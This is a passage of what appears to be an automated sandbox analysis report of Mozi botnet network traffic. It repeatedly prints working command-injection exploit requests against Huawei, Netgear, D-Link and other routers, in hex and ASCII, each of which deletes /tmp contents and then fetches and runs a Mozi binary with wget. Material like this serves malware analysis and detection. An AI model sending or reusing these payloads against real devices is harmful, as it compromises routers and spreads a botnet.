2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 4.9.133.235:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 94.238.138.46:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 207.20.142.47:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 86.129.121.97:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 72.142.73.108:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 175.61.146.9:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 155.181.61.134:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope 